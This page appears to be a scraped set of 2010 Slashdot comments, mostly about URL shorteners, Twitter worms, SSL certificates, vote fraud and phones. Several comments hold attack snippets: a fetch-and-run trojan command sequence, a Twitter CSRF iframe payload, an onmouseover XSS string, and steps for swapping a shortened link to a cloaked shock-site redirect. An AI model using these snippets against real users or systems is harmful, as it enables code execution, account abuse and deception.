example.com · Domains · Slashdot Mirror

Re:complete with tracking and statistics by tomhudson · 2010-10-02 08:47 · Score: 1 · on Google URL Shortener Opened To the Public

Once submitted, you can't change it, unfortunately

Absolutely not true. If you have control over the file it points to (for example, it points to http://example.com/news/20101001_lindsey_lohan_hooks_up_with_brad_pitt.php), you can replace the contents of that file with <?php header(location:http://goatse.fr);

You can even make it so that it does it at random times, or only when the user agent isn't googlebot.

So, the steps are:

create your file on server under your control that points to, say, a Failbook group
create shortened url
get people to use it
a month later change contents of your file to redirect to whatever you want.
blame google.

Re:Shouldn't Software Houses Be Held Accountable? by Anonymous Coward · 2010-09-29 06:04 · Score: 0 · on Gang Arrested For Stealing Millions Using ZeuS

You sound like a person blaming women being raped because she dresses sexy.

In the case of a trojan:

% wget http://malware.example.com/justinbiebernaked.gz
% gunzip justinbiebernaked
% chmod u+x justinbiebernaked
% sudo ./justinbiebernaked

Oh noes, I purposely ran an untrusted executable! It's odd that you liken this to rape of women. The equivalent:

1. Woman goes to sex shop
2. She purchases a dildo
3. Gets home, undresses
4. Uses dildo on herself

Sorry, that is not rape.

Re:I guess this script is baaaad for you. by nacturation · 2010-09-27 05:50 · Score: 4, Informative · on Twitter Hit With Second Worm In a Week

This post explains it quite well: http://www.andrewnacin.com/2010/09/26/csrf-twitter/

Essentially, just create one or more iframes, with the iframe source set to http://twitter.com/share/update?status=WTF+PAYLOAD

As long as you're logged into Twitter via the web, it will auto-post that update without any request for permission from you.

Re:Again? by iLogiK · 2010-09-21 01:58 · Score: 1 · on Twitter Suffers Web Interface Exploit

From I could tell, the string looks something like this: http://example.com/#@"onmouseover=">"

my guess is this is come bug related to how they handle hashtags/user profile links

I think they're regularly running a script that takes out the # from the link from old tweets

Re:Torn by houghi · 2010-09-07 05:12 · Score: 4, Informative · on NYT Password Security Discussion Overlooks Universal Logins

There used to be a time that you could easily host your own OpenID with e.g. http://siege.org/phpmyid.php
You point to http://yoursite.example.com/ instead of the one from Google or any other OID provider.
That way you limit the chance of giving somebody else access as you manage your own login and password.

Some others might be found here : http://openid.net/developers/libraries

Re:Nexus One is sold out by squiggleslash · 2010-08-10 14:54 · Score: 1 · on Flash Ported To iOS and iPhone 4

So in order to buy an Android phone without a contract, you have to plan to develop software for sale on Android Market.

...or buy it from T-Mobile. You can buy unsubsidized, contract-free, phones from T-Mobile (the great thing is if you do buy the phone unsubsidized, the plans are cheaper now too.)

Stories Slash Boxes Comments Slashdot Search News for nerds, stuff that matters * squiggleslash * Help & Preferences * Subscription * Firehose * Journal * Tags * Bookmarks * Logout * Customize Sections * Main * Apple * AskSlashdot * Book Reviews * Developers * Games * Hardware * IT * Index * Interviews * Linux * Mobile * Politics * Science * Technology * YRO Site Info * FAQ * Bugs * Code Stories * Old Stories * Old Polls * Hall of Fame * Submit Story Slow Down Cowboy! Slashdot requires you to wait between each successful posting of a comment to allow everyone a fair chance at posting a comment. It's been 4 minutes since you last successfully posted a comment Chances are, you're behind a firewall or proxy, or clicked the Back button to accidentally reuse a form. Please try again. If the problem persists, and all other options have been tried, contact the site administrator. Reply to: Nexus One is sold out * Nexus One is sold out (Score:4) by tepples (727027) writes: FriendFriend of a Friend on 2010-08-09 11:26 (#33189422) Homepage Nexus One In this page, Google wrote: The Nexus One is no longer available for purchase directly from Google. For more information on how to purchase the Nexus One, check out our help center. In this page, Google wrote: The Nexus One is no longer available for direct purchase from Google, but is available through Brightstar for sale to registered developers. Please note that Brightstar's Nexus One purchase page is only accessible to registered developers. So in order to buy an Android phone without a contract, you have to plan to develop software for sale on Android Market. Not everybody who wants a counterpart to iPod Touch that runs Android is interested in developing software for sale on Android Market. Reply to This Post Comment Preview Comment * Re:Nexus One is sold out (Score:?) by squiggleslash (241428) writes: on 2010-08-10 22:53 Homepage Journal So in order to buy an Android phone without a contract, you have to plan to develop software for sale on Android Market. ...or buy it from T-Mobile. You can buy unsubsidized, contract-free, phones from T-Mobile (the great thing is if you do buy the phone unsubsidized, the plans are cheaper now too.) -- My moved journal [livejournal.com] Edit Comment Name squiggleslash [ Log Out ] URL http://squiggleslash.livejournal.com/ Subject Comment

So in order to buy an Android phone without a contract, you have to plan to develop software for sale on Android Market.

...or buy it from T-Mobile. You can buy unsubsidized, contract-free, phones from T-Mobile (the great thing is if you do buy the phone unsubsidized, the plans are cheaper now too.)

Use the Preview Button! Check those URLs! No Karma Bonus No Subscriber Bonus Post Anonymously Allowed HTML

- URLs http://example.com/ will auto-link a URL Important Stuff * Please try to keep posts on topic. * Try to reply to other people's comments instead of starting new threads. * Read other people's messages before posting your own to avoid simply duplicating what has already been said. * Use a clear subject that describes what your message is about. * Offtopic, Inflammatory, Inappropr

Re:tl;dr by JWSmythe · 2010-08-09 08:48 · Score: 1 · on Buried By The Brigade At Digg

Well, it wasn't worthy of publication. It's pretty simple to do. I had made some code available in the past, which used a variation of it to avoid abuses of message boards.

I'm not really looking for fame or fortune, so "father of...[anything but my kids]" doesn't interest me much.

But like I said, it's not rocket science. Did someone with the same identifier [username, cookie id, IP, etc, etc] vote the same way over a threshold for the same item? If so, disregard all their votes during tabulation. It does require all the voting information to be used during tabulation, not just a historical tabulation against the current numbers.

For example, I've seen voting that just does the following (in pseudocode)
$total_votes $total_score

$total_score = $vote + $total score; $total_votes++;

$current_score = $total_score / $total_votes;

That is fine and dandy until some schmuck has a script hit your voting script 100,000 times with the same vote. Now you can either purge the voting information, or let it ride.

The alternative is to record every vote with whatever identifying information you can. There are circumstances where you may not even record a vote, but that would only be obvious ones like if wget or curl were in the USER_AGENT string.

Now you can see if the same identifying information did the same action too many times. If you allow exactly one vote per user, disregard all the votes from any user who exceeds that threshold. To be polite, you may want to allow say 5 votes. Someone may click twice, but if they come back and do it 5 times, it's probably abuse.

Likewise, if you are confident that particular identifiers are bogus, you can prune those completely. For example, if you see inbound clicks from http://ballotstuffers.example.com/ automatically add those user identifiers to the list to disregard.

Hmmm.. There were a couple other methods. I can't remember those offhand, and I haven't had access to the code for a few years.

It could be said that this is sampling, but really it's just avoiding abuse. We aren't taking a percentage of the samples, we're taking all the votes from people who aren't likely to be fraudulent. If you take 1 in 10 samples for voting, and you have 11,000 votes (10,000 from ballot stuffers, 1,000 from legitimate voters), your ballot stuffers will still have the majority of the votes. If you automatically exclude 100 voters, who account for 10,000 of the 11,000 votes, you will likely have a fairly accurate vote. if you go with the IP as the user identification, you'll likely trim out AOL (who needs 'em) or any other group of people behind a common proxy or NAT. You'll still have the majority of voters being counted.

In real-world political elections, this would be obvious if say 10,000 residents in a district returned 110,000 ballots. Sadly though, that happens, and none of the votes are excluded from the tabulation. Here are some examples. You can go find more on your own.

The real solution to this, if you needed accurate votes, would be to require authentication for each voter, and only provide them with credentials once they proved that they are truly individuals. You may still have some fraud, but it would then be based on the fact that people will give away their votes. This is true of proxy votes. A bunch of people and I

Re:Technology isn't Facebook's value per se by corbettw · 2010-07-30 03:36 · Score: 1 · on Could Open Source Render Facebook the Next AOL?

Then you'd still need a way for those different servers to know about each other. Which still means some kind of central repository.

Although now that I think about it, if each of these servers provided a standard XML file at the same URL (eg, http://example.com/users.xml), then search engines could crawl that file and have their list of who's on what. That might work.

Re:Will be a hard pill to swallow... by squiggleslash · 2010-07-16 00:21 · Score: 1 · on Apple To Hold iPhone 4 Press Conference

Are you under the impression that social programs can't be socialist?

Socialism is the principle that people can work together for the common good rather than competing with one another. People organizing, through the government, to ensure they all have access to quality healthcare is certainly an example of that. Universal Healthcare has, historically, was a concept created and promoted by the socialism movement.

Universal Healthcare is not about the profit motive. It's not about people competing with one another for resources, and shareholders making a buck. It's about people working together for something that's good. It's the very definition of socialist. And that's not a bad thing.

Slow Down Cowboy! Slashdot requires you to wait between each successful posting of a comment to allow everyone a fair chance at posting a comment. It's been 4 minutes since you last successfully posted a comment Chances are, you're behind a firewall or proxy, or clicked the Back button to accidentally reuse a form. Please try again. If the problem persists, and all other options have been tried, contact the site administrator. Reply to: Re:Will be a hard pill to swallow... * Re:Will be a hard pill to swallow... (Score:2) by pnewhook (788591) writes: Alter Relationship on 2010-07-15 23:29 (#32922822) Universal heath care is a good thing but it is not socialist. Its a social program - completely different. Reply to This Post Comment Preview Comment * Re:Will be a hard pill to swallow... (Score:?) by squiggleslash (241428) writes: on 2010-07-16 8:21 Homepage Journal Are you under the impression that social programs can't be socialist? Socialism is the principle that people can work together for the common good rather than competing with one another. People organizing, through the government, to ensure they all have access to quality healthcare is certainly an example of that. Universal Healthcare has, historically, was a concept created and promoted by the socialism movement. Universal Healthcare is not about the profit motive. It's not about people competing with one another for resources, and shareholders making a buck. It's about people working together for something that's good. It's the very definition of socialist. -- My moved journal [livejournal.com] Edit Comment Name squiggleslash [ Log Out ] URL http://squiggleslash.livejournal.com/ Subject Comment

Are you under the impression that social programs can't be socialist?

Socialism is the principle that people can work together for the common good rather than competing with one another. People organizing, through the government, to ensure they all have access to quality healthcare is certainly an example of that. Universal Healthcare has, historically, was a concept created and promoted by the socialism movement.

Universal Healthcare is not about the profit motive. It's not about people competing with one another for resources, and shareholders making a buck. It's about people working together for something that's good. It's the very definition of socialist. Use the Preview Button! Check those URLs! No Karma Bonus No Subscriber Bonus Post Anonymously Allowed HTML

- URLs http://example.com/ will auto-link a URL Important Stuff * Please try to keep posts on topic. * Try to reply to other people's comments instead of starting new threads. * Read other people's messages before posting your own to avoid simply duplicating what has already been said. * Use a clear subject that describes what your message is about. * Offtopic, Inflammatory, Inappropriate, Illegal, or Offensive comments might be moderated. (You can read everything, even moderated posts, by adjusting your threshold on the User Preferences Page) If you are having a problem with accounts or comment posting, please yell for help.

Re:Mod parent up by AusIV · 2010-06-29 05:10 · Score: 2, Insightful · on 22 Million SSL Certificates In Use Are Invalid

Maybe you're not talking to the entity you thought you were talking to without verification, but at least only the party on the other end can read your message.

Any party along the way can read your message if there's no identification. If I'm trying to talk to https://example.com/ without identification while any node between me and example.com is compromised, that node can establish an encrypted connection with example.com and an encrypted connection with me. I send the attacker encrypted data, the attacker decrypts it, logs it, re-encrypts it for example.com, and forwards it along. This does require an active role, but there's no reason to assume someone who wants to steal your data is going to assume a passive role. As I stated in my last post, you can take an active role simply by being on the same network (wireless or otherwise) as your victim.

it's foolish to say there are no advantages over totally unencrypted traffic in these days when our ISPs sell our personal data and governments are increasingly monitoring Internet traffic.

But encryption without identification offers little practical advantage in this case. Your ISP could man-in-the-middle your HTTPS connection, collect data, and continue selling your personal data.

Why can't the browser just encrypt things and make no claims about identity verification?

They tried this for years, and users kept giving up sensitive data to phishers. Most users don't check for the lock or identity information like they should. The current approach that browsers are taking puts more control in the hands of the destination website. If the web server is requiring an HTTPS connection, the browser assumes the connection needs to be secure. If the HTTPS connection doesn't provide identity information, it is susceptible to man-in-the-middle attacks and cannot be considered secure. Since the web server is effectively saying it requires a secure connection, and the browser cannot consider the connection to be secure, it tells the user that something is wrong and they should take extreme caution if the choose to proceed.

Re:Duh by NNKK · 2010-06-28 14:08 · Score: 4, Interesting · on 22 Million SSL Certificates In Use Are Invalid

Virtual hosts mean if you just do an IP scan you will likely run into an SSL site that doesn't match the first URL associated with an IP.

Wish I had mod points. I was about to post the exact same thing.

Even ignoring servers hosting multiple distinct sites (e.g. at a typical webhosting company) on one IP with some sort of management interface behind SSL on port 443, sites are often configured with their "secure" portion behind a different vhost, but the same IP (e.g. http://example.com/ may point to the same IP address as https://secure.example.com/, but you're still going to get an SSL-secured response from https://example.com/, just not the one you might expect).

One can make reasonable arguments that these might not be ideal configurations, but they don't present the serious practical problems implied by the article.